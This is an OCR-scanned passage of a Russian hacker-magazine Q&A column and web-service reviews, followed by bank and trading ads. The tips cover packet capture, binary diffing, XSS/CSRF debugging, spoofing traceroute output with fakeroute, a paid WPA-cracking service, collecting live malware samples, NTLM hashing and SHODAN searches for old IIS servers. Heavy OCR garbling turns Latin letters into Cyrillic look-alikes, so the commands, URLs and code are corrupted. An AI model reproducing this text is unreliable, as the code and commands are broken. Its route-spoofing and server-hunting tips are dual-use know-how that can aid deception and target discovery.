4В05-В43 0-4СБ67527С189 } (Кеаікек 



КТБ8168В/ 8111В РСІ-Е СідаЬік 
ЕЫтегпек БІС) 

Для перехвата трафика со второго интерфей- 
са достаточно ввести в консоли: 

ІзЬагк -і 2 -ѵѵехатріе.рсар -1 "1ср[13] = 0x14 м , 
где 

-і — указывает какой интерфейс прослуши- 
вать; 

-ѵѵ — задает, в какой файл сохранять перехва- 
ченные пакеты; 

-і — определяет фильтр пакетов, использу- 
ющий синтаксис ІіЬрсар (в данном случае, 
сохраняем Іср пакеты с 13-ым битом в заго- 
ловке равным 0x14, то есть пакеты с уста нов - 
ленны ми флагами Р5Т и АС К). Подробнее 
про синтаксис можно узнать в Мануэле ѵѵѵѵѵѵ. 
сз.исг.есІи/~тагіо5/еіЬегеа[-1срсІитр.рсІ1 и на 
са йте ѵѵѵѵѵѵ.ісрсіитр.огд/ісрсіитр тап.ЫтГ 
Для того чтобы закончить захват пакетов, до- 
статочно нажать <С1г1-С>. Полученный файл 
ехатріе.рсар можно загрузить в ѴѴігезЬагк и 
спокойно, без всякихтормозов, анализиро- 
вать. 

0: Скажи, как можно сравнить две версии 
одной и той же динамической библиотеки или 
бинарника, чтобы посмотреть, какие функции 
изменились и что именно в них изменилось? 

А: Для того чтобы сравнить, что изменилось в 
приложении, можно использовать следующие 
плагины для ЮА: 

• ВіпЮіІІ ( ѵѵѵѵѵѵ.гѵпатісз.сот/ЬіпсІіІІ.ЬітІ ) 

• ТигЬоОіІІ ( согеІаЬз.согезесигіІѵ.сот/іпсІех.р 
Ьр?тоби1е=ѴѴікі&ас1іоп=ѵіеѵѵ&1ѵре=1оо1&пат 
е=1игЬос!і11 ) 

Схема работы проста: дизассемблируем пер- 
вую библиотеку, затем вторую. После этого от- 
крываем первый диззасемблинг (*.ісІЬ файл), 
заходим в Есііі Ріидіпз ТигЬосШ/ВіпсІіІІ и 
выбираем опцию «сот раге ѵѵііГі », после чего 
указываем файл с диззасмеблингом второго 
файла. В результате программа выдаст под- 
робный отчетотом, какие были произведены 
изменения в исполняемых файлах. 

0: Ковыряю скрипты на наличие Х55/С5ВР- 
багов, не хватает хорошего средства для 
отслеживания .ІаѵаБсгірІ-событий. Подскажи, 
чем лучше пользоваться? 

А: Скрипты, отладка, Х55, 9аѵазсгір1 — для 
всего этого хорошо подходит связка Рігеіох 
+ РігеЬид + ЕѵепіЬид. Если о первых двух 
знают практически все, то ЕѵепіЬид, кото- 
рый появился совсем недавно, многие по 
незнанию обходят стороной. Забавно, что это 
плагин для РігеЬид' а, который сам по себе уже 
является плагином (а потому мы удивляемся, 
что Рігеіох стал почему-то тормозить :)). А 
предоставляет он как раз то, что тебе нужно: 
позволяет просматривать все обработчики 
событий на странице. После его установки в 
РігеЬид появляется дополнительная вкладка 
«Еѵепіз». Теперь для того, чтобы посмотреть 
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обработчики какого-либо элемента, доста- 
точно выделить его, и все обработчики сразу 
отобразятся на панели. Для работы ЕѵепіЬид 
требует Еігеіох 3.6 и РігеЬид 1 .5 или выше. Сам 
ЕѵепіЬид находится в стадии активной дора- 
ботки и пока доступна только бета-версия, 
которую можно взять здесь — деІІігеЬид.сот/ 
геІеазез/еѵепіЬид/1 .5/еѵепіЬид-О.І Ь4.хрі . 

О: Известно, что многие пользователи Ыпих ис- 
пользуют утилиту Ігасегоиіе для исследования 
сети. Можно ли ее как-то обмануть? 

А: Нетничего невозможного :). Специально 
для этого была создана программка Еакегоиіе 
[ ѵѵѵѵѵѵ.ІбоидЫсгіте.огд/зо^ѵѵагеЛакегоиІе ]. 
Она позволяетзадать поддельный маршрут, 
который будет добавлен к реальному. Скажем, 
реальный маршрут выглядиттак: 

СгасегоиСе Со уууу (63.199 . уу .ууу ) , 
3 0 корз шах, 3 8 ЪуСе раскеСз 

1 хх. ххх. сот (172.17.8.1) 0.867 шз 
0.713 шз 0.601 шз 

2 асЗзІ-64 . сізі . зп1с21 .расЬеІІ .пек 
(64.165. ххх . ххх ) 2.065 шз 1.895 шз 
1.777 шз 

3 уууу. сот ( 63 . 199 .уу .уууу ) 28.585 
шз 26.445 шз 25.489 шз 

Атеперь чуть поиграем с ним с помощью 
Еакегоиіе'а: 

СгасегоиСе Со уууу (63.199 .уу .ууу ) , 
3 0 Сюрз шах, 3 8 ЬуСе раскеСз 

1 хх. ххх. сош (172.17.8.1) 0.867 шз 
0.713 шз 0.601 шз 

2 асІзІ-64 . сізі . зпСс21 .расЬеІІ .пеС 
(64.165. ххх . ххх ) 2.065 шз 1.895 шз 
1.777 шз 

3 ѵтЬ243 .еор.доѵ (198.137.241.43) 
0.442 шз 0.553 шз 0.42 шз 

4 СоипсІаСіоп . кд . паза . доѵ 
(198.116.142.34) 0.442 шз 0.542 шз 
0.422 шз 

5 уууу. сот ( 63 . 199 .уу .уууу ) 28.585 
шз 26.445 шз 25.489 шз 

Несложно заметить, что на пути следования 
магическим образом появилось несколько 
любопытныхузлов :]. 

0: Каким образом можно зарабатывать деньги 
на информационной безопасности, кроме как 
проводить непосредственно пентесты? Естест- 
венно, легально. 

А:Насамом деле, каки влюбой другой нише, 
возможностей здесь миллион. Если не брать 
в расчет разработку и продажу специали- 
зированного софта, выполняющего те или 
иные проверки, то можно привести в пример 
несколько успешных веб-сервисов. Взять 
хотя бы продажу ѴРІЧ, когда бизнесменам и 




политикам, требовательным к безопасности, 
необходимо работать исключительно через 
защищенное соединение. Увы, те абузоус- 
тойчивые ѴРІ\І, которые продаются хакерам 
для анонимности, не вполне легальны, 
потому что владельцы и хостинг намеренно 
игнорируют жалобы и обращения компе- 
тентных органов. Другой пример — сервис 
по взлому ѴѴРА-ключа с помощью облачных 
вычислений ѴѴРА Сгаскег ( ѵѵѵѵѵѵ.ѵѵрасгаскег. 
сот ). Ребята подняли кластер из 400 процес- 
соров, нагенерировали огромное количес- 
тво радужных таблиц (для 1 35 миллионов 
паролей], а теперь предоставляют доступ к 
этому хозяйству за небольшую денежку. В 
результате, любой желающий за 1 7$ может 
попробовать взломать ключ ѴѴРА или пароль 
к 2ІР-архиву. На перебор по таблицам уйдет 
не более 20 минут, в то время какуобыч- 
ного двухяредрного компьютера на туже 
задачу ушло быбдней.Сервисиз сегод- 
няшнего ѴѴѴѴѴѴ2 — 5Н00АЫ ( ѵѵѵѵѵѵ.зЬосІапЬд. 
сот ], позволяет по заданным параметрам 
найти серверы (например, работающие на 
версии Ара с бе]. Общая часть функционала 
бесплатна, но если хочешь экспортировать 
результаты в удобном ХМЕ формате, изволь 
заплатить денежку. Короче говоря, возмож- 
ность сделать абсолютно легальный сервис, 
который напрямую касается ИВ и приносит 
деньги — более чем реально. 

0: Где бы раздобыть свежих образцов мал вари 
для анализа?:] 

А: Проще всего, зайти на ѵѵѵѵѵѵ. 
таІѵѵагесІоппаіпІізЕсопп и ѵѵѵѵѵѵ.ппаіѵѵагеигі. 

сот и скачать свежую базу доменов, откуда 
производится загрузка троев и другой малва- 
ри. Дальше все просто: запускаем виртуаль- 
ную машину, открываем в старом непатченном 
браузере один сайт за другим и, анализируя 
изменения в файловой системе и реестре 
(утилитами ЕедМоп/ЕіІеМоп], и удивляемся, 
насколько легко можно подцепить троя, прос- 
то серфя инет. 

0: Нужно быстро генерировать ИТЬМ-хеш, как 
это сделать? 

А: Воттебе пример на Руібоп'е, и это, пожалуй, 
наиболее простой способ: 

ішрогк казЫіЪ , Ъіпазсіі 
казк = казЫіЬ . пеы ( ' пкМ ' , 

" ккізізшуказкѵаіие " . епсосіе ( 'иСІ- 

161е ' ) ) . сіідезк ( ) 

ргіпС Ьіпазсіі . Ьехіііу (казк) 

0: Устроился на подработку админом в одну 
небольшую компанию (30 компьютеров в 
локалке, несколько серверов). Пользователи 
умудряются моментально засорить место на 
І-Шй, из-за чего начинает глючить внутренний 



софт, написанный не самым лучшим програм- 
мистом. Как бы централизовано проверить 
наличие свободного места на каждом из 
компьютеров? 

А: Я бы сделал это с помощью РоѵѵегЗЬеИ'а, 
используя функцию ОеІ-ѴѴМЮЬіесІ ѴѴі п32_ 
І_одісаЮІ5к. Предположим, список компьюте- 
ров хранится у нас в файле сЛЬозШзЕМ, тогда 
для вывода информации о свободном месте 
на каждом из хостов можно получить одной 
единственной командой: 

СеС-Тл/МІОЬф еск Шіп32_ЬодісаІБізк 
-Ііікег "БгіѵеТуре=3 ? 

-сошрикег (Сек-Сопкепк с:\ 
козкіізк . кхк ) | Зеіеск 
ЗузкетЕГате , БеѵісеІБ, ѴоІишеЫаше , @ 
{Ыате="зІ 2 е (СВ) " ; Ехргеззіоп= { " { 0 
: N1 } " -і ( $_. зіге/ІдЪ) } } , @ {Ыате= " 
Ігеезрасе (СВ) " ; Ехргеззіоп= { " { 0 : 
N1}" -1 ( $_. Ігеезрасе/ІдЬ) } } I Оик- 
СгісІѴіеѵѵ 

Надо заметить, что большая часть кода зани- 
мается выводом и фильтрацией результата. 

0: Каким образом можно наиболее безболез- 
ненно мигрировать с Му5СІІ_ на 5СІІ_ Бегѵег? 

А: С такой ситуацией недавно столкнул- 
ся лично, когда начальство попросило 
осуществить подобный переход. Сложность 
заключается в том, что в Му5С11_ многие вещи 
отличаются от 501_ Зегѵег. Для того чтобы не 
заморачиваться со многими нюансами вруч- 
ную, можно автоматизировать процесс — для 
этого специально создана утилита Місгозоіі 
5ц I Бегѵег Мідгабоп Аззізіапі; Іо г Му50І_ (ЬіС 
Іу/8ре2ст]. 

О : Хочу посмотреть фильм на своем аппа- 
ратном НЮ-проигрывателе. Кпроигры- 
ваемому видеофайлу нельзя подключить 
внешнюю звуковую дорожку (хочу посмот- 
реть фильм в оригинале), поэтому прихо- 
дится заранее это делать на компьютере. 
Пользуются сложным видеоредактром: 
муторно и сложно. Подскажи какой-нибудь 
простой способ. 

А: Бесплатная программа АѴІ-Мих 61Л ( ѵѵѵѵѵѵ. 
аіехапсіег-пое.сот/ѵібео/атд ] — то, что док- 
тор прописал. Процесс в этом случае проще 
простого: 

• выбираешь видео файл; 

• извлекаешь информацию о доступных ау- 
диодорожках (кнопка «депегаіе баіа зоигсе»]; 

• далее добавляешь в программу (можно пря- 
мо Огад'п'Огор'ом] файлы с другими звуковы- 
ми дорожками; 

• нажимаешь ЗіагІ, чтобы через некоторое 
время получить готовый файл. 

С помощью этой же программы можно склеить 
и несколько видеофайлов в один. ЗС 
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БНОйАЫ 

ѵѵѵѵѵѵ.зІіосІапЬд.сопп 

Как бы выглядел боодіе, если бы он искал не информацию, а непос- 
редственно серверы? Создатели 5Н00АЫ ответили на этот вопрос. Сер- 
вис за несколько секунд позволяет найти серверы/роутеры для анализа, 
подходящие под заданные параметры. В основе сервиса — большая база 
серверов (прежде всего, веб, но постепенно добавляется инфа для РТР/ 
ТеІлеІ/55Н-демонов] с иххарактеристиками, а его веб-часть предо- 
ставляетпараметризованный поиск. Например, если мыхотим найти 
серверы, на которых установлен АрасЬе, то задаем в поиске «АрасЬе» 

— и получаем огромный перечень ресурсов. Уточняем версию: «арасбе 
2.2.3» — список сужается. Помимо этого, можно использовать ключи 
соипЫу, Нозіпате, пер оз, рогТ В результате ничего не стоит, например, 
найти серверы на 155, которые хостятся на винде и находятся в Штатах: 
«МісгозоД N5 оз:"\а/іпсіоѵѵ5 2000" соипІгу:ІІ5». 



Для просмотра 
умерших сайтов 

ѴѴАѴВАСК МАСНІЫЕ 

ѵѵеЬ.агсЫѵе.огд 

Если вдруг какой-то ресурс перестает существовать или просто падает, 
переставая отвечать на вопросы, а какая-то его часть кровь из носа как 
нужна, на помощь приходят два инструмента. Во-первых, сохраненные 
копии можно попробовать вытащить из кэша бооіде или других поиско- 
виков. А во-вторых, естьѴѴаубаск МасЫпе, о которой много кто слышал, 
но мало кто пользуется. Последняя отличается тем, что делает полную 
копию ресурса, включая картинки и файлы, причем сохраняет историю 
версий. Так, когда мне недавно стало интересно, что же за троян был в 
софте для аккумуляторов Епегдігег (подробнее читай в МЕ6АЫЕѴѴ5], я 
смогскачатьего из архива ѴѴауЬаск МасЫпе, несмотря нато что файлов с 
зараженной программой на оригинальном сайте и дажессылокна нихв 
кэше гугла уже не было. 
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Для создания каркаса 
веб-сайта 



РЕСОЫБТРиСТОР 

ѵѵѵѵѵѵ.гесопБІгисІог.огд 

В одном из ѴѴѴѴѴѴ2 я рассказывал о сервисе 51І5Е Біисііо (зизезіисііо. 
сот) для сборки собственного дистрибутива на базе 51І5Е Ыпих. Теперь 
же благодаря инструменту Ресопзіхисіюгтакая возможность есть и для 
фанатов ІІЬиЫи и ОеЬіап. В два счета можно собрать кастомайзный Ыпих, 
полностью подогнав его под себя. Ты сам выбираешь нужные пакеты, 
модули, графическую оболочку, можешь настраивать конфиги, добавлять 
в проект произвольные файлы. При этом работать на Ыпих’е своей мечты 
можно коллективно, совместно с другими пользователями сервиса. 



М0СКІЫ6ВІК0 

ѵѵѵѵѵѵ.дотоскіпдЬігсІ.сот 

Когда мне нужно сделать прототип или каркас для приложения или 
веб-сайта, я обычно использую замечательную программу Ахиге КР 
ѵѵѵѵѵѵ.ахиге.сот Другие решения по разным причинам не подходили, и 
воттеперь, наконец, появилась альтернатива. Свежая находка — сервис 
тоскіпдбігсі, позволяющий вудобнейшей форме набросать каркас для 
сайта или веб-админки. Процесс проектирования удивляетсвоей про- 
стотой. Причем шаблоны для разных частей сайта можно связать между 
собой и интуитивно между ними перемещаться. В завершение можно 
расшарить сам проект или экспортировать результат в РЫ6/Р0Р файл. 
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Наш РС никогда не висит! 




А Альфа Банк (дате)іамі 



( 495 ) 78 - 888-78 (для Москвы), 8 - 800 - 2000-000 (бесплатно ДЛЯ регионов России) ОАО «АЛЬФА-БАНК». Генеральная лицензия Банка России на осуществление банковских операций от 29.01.1998 №1326 . НА ПРАВАХ РЕКЛАМЫ. 
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МеІаТгас1ег4 



• Воплощение концепции «все-в-одном» 

возможность анализировать динамику финансовых инструментов, 
совершать торговые операции, создавать и использовать программы 
автоматического трейдинга; 

• Простота в использовании 

русскоязычное меню, возможность работать, не устанавливая програм- 
му на компьютер, понятный и удобный интерфейс, возможность 
торговать прямо с графиков; 

• Соответствие последнему слову в ІТ-разработоках для финансового 
сектора 

\УАР, версия для КПК и смартфона; возможность работы через 
крупнейшую систему электронной торговли (ЕС№) Сиггепех; 

• Полноценная информационная поддержка клиентов 
круглосуточный пакет новостей оп-1іпе для клиентов от информационных 
агентств Боѵ^опез №\ѵ8\ѵіге8 и «Прайм-ТАСС». 



На сегодняшний день информационно- 
торговая платформа МеІаТгасІег явля- 
ется одним из самых популярных 
и передовых инструментов для работы 
на финансовых рынках. Терминал 
позволяет торговать самыми разными 
финансовыми продуктами: валютами, 
контрактами на разницу (СЕБ) на акции 
и фьючерсы с одного счета. 



Компания «Альпари» 

Профессиональные услуги на финансовых рынках 

8 ( 800 ) 200 - 01-31 

Звонок по России бесплатный 

ѵ\п/\А/ѵ.а1рагі.ш 




Москва: Руновский переуолк, д. 1 0; (495) 710-76-76. Санкт-Петербург: ул. Ефимова, д. 4А, оф. 405; (81 2) 441 -29-30, 441 -29-31 , В. О. 26-я линия, 
д. 15, кори. 2, оф. 5.7; (812) 322-22-41, 322-44-47. Ростов-на-Дону: пр. Буденновский, д. 60, оф. 1201; (863) 218-18-00, (863) 218-18-05. 
Новосибирск: ул. Ленина, д. 52, 8 этаж, оф. 804; (383) 287-25-43, 238-07-53. Екатеринбург пр. Ленина, д. 25, оф. 4.115; (343) 378-20-38. 
Нижний Новгород: ул. Ульянова, д. 26/1 1 , оф. 1 307; (831 ) 41 4-73-80, 41 1 -73-80,41 1 -82-67. Казань: ул. Спартаковская, д. 6, 1 4 этаж, оф. 1 408; (843)526-55-40. 



